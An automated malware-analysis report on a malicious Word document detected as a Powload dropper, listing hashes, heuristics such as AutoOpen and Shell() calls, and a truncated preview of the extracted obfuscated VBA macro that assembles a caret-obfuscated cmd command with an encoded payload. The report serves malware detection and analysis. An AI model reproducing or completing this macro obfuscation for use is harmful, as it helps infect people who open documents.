Office (OLE) malware analysis — malicious · 3ccb8a7e7e9341fc

MALICIOUS

Office (OLE)

91.0 KB Created: 2018-08-29 21:58:00 Authoring application: Microsoft Office Word First seen: 2019-05-31

MD5: d4e83a7746caff0ea41742b41c436cef SHA-1: a53be51d1c04671241c0f6307f7da6643e8a9b35 SHA-256: 3ccb8a7e7e9341fc1243d8a0940f625dd14f403f84b632cc298c00695fd8891d

202 Risk Score

Heuristics 6

ClamAV: Doc.Dropper.Powload-6666844-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Dropper.Powload-6666844-0
VBA macros detected medium 2 related findings OLE_VBA_MACROS

Document contains VBA macro code
Shell() call in VBA critical OLE_VBA_SHELL

Shell() call in VBA
AutoOpen macro high OLE_VBA_AUTOOPEN

AutoOpen macro
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC

OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 10027 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	10027 bytes
SHA-256: `9351513d4ddfa2997148aee47603bb04a417190b44b923345c0f641c44731a03`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "GwIipOcF" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Attribute VB_Name = "FntjKBbv" Function rUOCPCqX() On _ Error _ Resume _ Next Hour rlfMrn * HtrUa Hour wDMuA / ZVFRJ Hour hMFALc * BwXzJs Hour 42849 / IzmOR / MJwFAI / woJpHt qcrDWhjPVv = "md /V" + ":O/" + "C" + Chr(3 + 4 + 1 + 4 + 22) + "^s" + "^et ^U^" + "m^gK=" Hour CjWWbl / NFAcIC * 64863 / zzQwS ssqNwSST = "=" + "^AAI^" + "A^A" + "CA^g" + "^AA" + "^I^AA" + "C^A^gAA" + "^I^A" + "^ACAgAA" + "I^AAC^A" + "^g^AA" + "^I" Hour CFUVO / WGEKXZ / PiDZp / UKjdYa Hour 63550 * IbEMI NTJBZY = "A^" + "ACA" + "gA^A^I^" + "A^ACA^9" + "B^" + "QfA" + "^sHAo" + "^B^w^Y" + "A^QHA^" Hour 18225 * HjCVti / fWQWr * bvvLY Hour zjUEP * aDhMpM haFKMjiFa = "hB^w^Y^" + "A^0^HA^" + "7^A^wa" + "^A" + "^E^G" + "A^lBg" + "cAIG^A" + "^" + "7^AwY" Hour jrApW * XjVjaB * 96514 * sIHbmQ Hour 46669 * SKMobV Hour TBVRNs * ECDRV / iqdFDX * DajXsd taXKAKfm = "A" + "QE" + "^At" + "B^" + "A^JAA" + "CA^t^" Hour jcEOR * Wjtwjt Hour ziwWtX / TFifXQ Hour ZkbFWC / VzqHr KjpDXh = "B^QZA" + "QH^A" + "JB^Q^LA" + "^U^G^" + "A" + "r" + "B^wbA^Y" + "^HAu^BQ" + "S" + "A" + "^s" + "^DAp" Hour sHntJ * 76369 * 30357 * DmEdz qouRnfBN = "^A^w" + "^Y" + "^AQE" + "^" + "A^tB^A^" + "J" + "^AAC^A" + "s" + "A^ge^" + "AcE^A" + "v^B" + "^A^J^A" Hour diVju / StiCO / 55697 / 27401 VWfUtmrZNsO = "^gC^AlB" + "A" + "^b^A" + "^k" + "^G^AGB^" + "AZ^" + "A^EG^Av" + "^" + "B^A^b^" + "A^" + "4G" + "^A^3B^" Hour 86560 / HZmKw Hour WKArw * LKJKX * SZVRb / dNpUio vbWfGY = "wbA" + "QEAu^A^" + "w^SAU" + "^H^A^" + "B" + "^BAJA^s" + "^H^A^" + "5" + "^Bg" + "cA" + "Q^H" + "A^7^BQ^" rUOCPCqX = qcrDWhjPVv + ssqNwSST + NTJBZY + haFKMjiFa + taXKAKfm + KjpDXh + qouRnfBN + VWfUtmrZNsO + vbWfGY Hour 9863 * zBhdNd * fMCDl * lWAbG Hour oDjNd * KWjjz Hour jOuTA / fzvIpR End Function Function IYmEfFXUI() On _ Error _ Resume _ Next Hour KsPYAj * tvnAi Hour ldTzIE * 17257 snEUKlpQ = "K^" + "AEEAC^B" + "QT^" + "AQ" + "C^A" + "^gA^g" + "b^Ak^GA" + "^" + "gA" + "ge" + "^Ac^E^" + "Av^BA^J" + "^A^gC" Hour 56999 / lWIHY Hour SwFkDM * 73356 ziFrEihi = "^A^oB^" + "w" + "^Y^AEG" + "^A" + "l" + "B^gc^A" + "^8" + "^G^AmB^" + "wOAcC^" + "Al^B^" + "A^e^A^U" Hour OqjKzY * RXRlPO Hour QJHfG * MDwVWZ wsQNhU = "G^A^" + "uA" + "^wJ^A^s" + "C^A^3^" + "B^QW^A^" + "AF" + "A^k^" + "A^wKAc" + "C^Ac^B" + "w^J^" + "A" Hour NNzjzl * tqizHK * 97531 / whoJVs Hour XZcMpF * nsHYz / 31874 * EEPGH Hour AnAHNh * IEfKJM Hour qUfuBZ * sFRGH Hour wwivV * vwdcLr QPsUIXBV = "s" + "C^Aj^BQ" + "aA^w^" + "G^A^iB" + "Q^" Hour 81347 * aQqFj / 54659 / qfjrq Hour zplSEw * qwQSbu YtLHBzf = "d^" + "A^" + "A^HA" + "^6" + "Ag" + "d^A^4^" + "G" + "^A" Hour psXbun / HwnQG / 37864 / doOklm Hour 20024 * dQFcVo / SJFjfD * BEnWl Hour dsinIf * DjwkPo PoPfoLEwD = "l^BAJ^A" + "0DA^j^B" + "AR^A^0^" + "G^" + "A^k" + "^" + "A^w^O^A" Hour 370 * AGLLST * jYXPY * 72009 EKhmljhcL = "cCA" + "yAQ" + "^OA^" + "UDAn^A" + "^A" + "^I^A0" + "^D" + "A" Hour sPitH * sTuHUW * 8095 / FGOJk Hour 23561 / LZJDjI Hour uwwDvI * GTVOr * KzDfO / 33290 oFjIMipnbp = "^" + "g^AwdA" + "^kFAQ^B" + "A^" + "J" + "^A^sD" + "A" IYmEfFXUI = snEUKlpQ + ziFrEihi + wsQNhU + QPsUIXBV + YtLHBzf + PoPfoLEwD + EKhmljhcL + oFjIMipnbp Hour PHzHEE / 70293 End Function Function acoTL() On _ Error _ Resume _ Next Hour auDlaq * YTDzct Hour 7291 * 58195 / 58589 * bsjvuq Hour 69022 / PNXZAO Hour 4953 * qPRUU * aGYUq / TShoE Hour wVPYi * BzbdiA / 37329 * Dlzqi HupBZO = "^p^A^w" + "JAA^" + "E^A" + "n^A^" + "AK^AQ^H" + "A^pB^A" + "b^" + "AAH^" + "ATBgL" Hour 16815 / hhwZA Hour rkzlP * DksiZ Hour 4998 / 34157 * JDGUA / BlHVXi BYCjaqjfv = "^AcC^A" + "^" + "G^BA^U" + "^AkH^Ar" + "B" + "QNA" + "wG" Hour 53427 * MwiTX Hour 99133 / pzpQra Hour 74753 / auju ... (truncated)

SHA-256: 9351513d4ddfa2997148aee47603bb04a417190b44b923345c0f641c44731a03

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "GwIipOcF"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "FntjKBbv"
Function rUOCPCqX()

On _
Error _
Resume _
Next
Hour rlfMrn * HtrUa
   Hour wDMuA / ZVFRJ
   Hour hMFALc * BwXzJs
   Hour 42849 / IzmOR / MJwFAI / woJpHt
qcrDWhjPVv = "md /V" + ":O/" + "C" + Chr(3 + 4 + 1 + 4 + 22) + "^s" + "^et ^U^" + "m^gK="
Hour CjWWbl / NFAcIC * 64863 / zzQwS
ssqNwSST = "=" + "^AAI^" + "A^A" + "CA^g" + "^AA" + "^I^AA" + "C^A^gAA" + "^I^A" + "^ACAgAA" + "I^AAC^A" + "^g^AA" + "^I"
Hour CFUVO / WGEKXZ / PiDZp / UKjdYa
   Hour 63550 * IbEMI
NTJBZY = "A^" + "ACA" + "gA^A^I^" + "A^ACA^9" + "B^" + "QfA" + "^sHAo" + "^B^w^Y" + "A^QHA^"
Hour 18225 * HjCVti / fWQWr * bvvLY
   Hour zjUEP * aDhMpM
haFKMjiFa = "hB^w^Y^" + "A^0^HA^" + "7^A^wa" + "^A" + "^E^G" + "A^lBg" + "cAIG^A" + "^" + "7^AwY"
Hour jrApW * XjVjaB * 96514 * sIHbmQ
   Hour 46669 * SKMobV
   Hour TBVRNs * ECDRV / iqdFDX * DajXsd
taXKAKfm = "A" + "QE" + "^At" + "B^" + "A^JAA" + "CA^t^"
Hour jcEOR * Wjtwjt
   Hour ziwWtX / TFifXQ
   Hour ZkbFWC / VzqHr
KjpDXh = "B^QZA" + "QH^A" + "JB^Q^LA" + "^U^G^" + "A" + "r" + "B^wbA^Y" + "^HAu^BQ" + "S" + "A" + "^s" + "^DAp"
Hour sHntJ * 76369 * 30357 * DmEdz
qouRnfBN = "^A^w" + "^Y" + "^AQE" + "^" + "A^tB^A^" + "J" + "^AAC^A" + "s" + "A^ge^" + "AcE^A" + "v^B" + "^A^J^A"
Hour diVju / StiCO / 55697 / 27401
VWfUtmrZNsO = "^gC^AlB" + "A" + "^b^A" + "^k" + "^G^AGB^" + "AZ^" + "A^EG^Av" + "^" + "B^A^b^" + "A^" + "4G" + "^A^3B^"
Hour 86560 / HZmKw
   Hour WKArw * LKJKX * SZVRb / dNpUio
vbWfGY = "wbA" + "QEAu^A^" + "w^SAU" + "^H^A^" + "B" + "^BAJA^s" + "^H^A^" + "5" + "^Bg" + "cA" + "Q^H" + "A^7^BQ^"
rUOCPCqX = qcrDWhjPVv + ssqNwSST + NTJBZY + haFKMjiFa + taXKAKfm + KjpDXh + qouRnfBN + VWfUtmrZNsO + vbWfGY
   Hour 9863 * zBhdNd * fMCDl * lWAbG
   Hour oDjNd * KWjjz
   Hour jOuTA / fzvIpR
End Function
Function IYmEfFXUI()

On _
Error _
Resume _
Next
Hour KsPYAj * tvnAi
   Hour ldTzIE * 17257
snEUKlpQ = "K^" + "AEEAC^B" + "QT^" + "AQ" + "C^A" + "^gA^g" + "b^Ak^GA" + "^" + "gA" + "ge" + "^Ac^E^" + "Av^BA^J" + "^A^gC"
Hour 56999 / lWIHY
   Hour SwFkDM * 73356
ziFrEihi = "^A^oB^" + "w" + "^Y^AEG" + "^A" + "l" + "B^gc^A" + "^8" + "^G^AmB^" + "wOAcC^" + "Al^B^" + "A^e^A^U"
Hour OqjKzY * RXRlPO
   Hour QJHfG * MDwVWZ
wsQNhU = "G^A^" + "uA" + "^wJ^A^s" + "C^A^3^" + "B^QW^A^" + "AF" + "A^k^" + "A^wKAc" + "C^Ac^B" + "w^J^" + "A"
Hour NNzjzl * tqizHK * 97531 / whoJVs
   Hour XZcMpF * nsHYz / 31874 * EEPGH
   Hour AnAHNh * IEfKJM
   Hour qUfuBZ * sFRGH
   Hour wwivV * vwdcLr
QPsUIXBV = "s" + "C^Aj^BQ" + "aA^w^" + "G^A^iB" + "Q^"
Hour 81347 * aQqFj / 54659 / qfjrq
   Hour zplSEw * qwQSbu
YtLHBzf = "d^" + "A^" + "A^HA" + "^6" + "Ag" + "d^A^4^" + "G" + "^A"
Hour psXbun / HwnQG / 37864 / doOklm
   Hour 20024 * dQFcVo / SJFjfD * BEnWl
   Hour dsinIf * DjwkPo
PoPfoLEwD = "l^BAJ^A" + "0DA^j^B" + "AR^A^0^" + "G^" + "A^k" + "^" + "A^w^O^A"
Hour 370 * AGLLST * jYXPY * 72009
EKhmljhcL = "cCA" + "yAQ" + "^OA^" + "UDAn^A" + "^A" + "^I^A0" + "^D" + "A"
Hour sPitH * sTuHUW * 8095 / FGOJk
   Hour 23561 / LZJDjI
   Hour uwwDvI * GTVOr * KzDfO / 33290
oFjIMipnbp = "^" + "g^AwdA" + "^kFAQ^B" + "A^" + "J" + "^A^sD" + "A"
IYmEfFXUI = snEUKlpQ + ziFrEihi + wsQNhU + QPsUIXBV + YtLHBzf + PoPfoLEwD + EKhmljhcL + oFjIMipnbp
   Hour PHzHEE / 70293
End Function
Function acoTL()

On _
Error _
Resume _
Next
Hour auDlaq * YTDzct
   Hour 7291 * 58195 / 58589 * bsjvuq
   Hour 69022 / PNXZAO
   Hour 4953 * qPRUU * aGYUq / TShoE
   Hour wVPYi * BzbdiA / 37329 * Dlzqi
HupBZO = "^p^A^w" + "JAA^" + "E^A" + "n^A^" + "AK^AQ^H" + "A^pB^A" + "b^" + "AAH^" + "ATBgL"
Hour 16815 / hhwZA
   Hour rkzlP * DksiZ
   Hour 4998 / 34157 * JDGUA / BlHVXi
BYCjaqjfv = "^AcC^A" + "^" + "G^BA^U" + "^AkH^Ar" + "B" + "QNA" + "wG"
Hour 53427 * MwiTX
   Hour 99133 / pzpQra
   Hour 74753 / auju
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.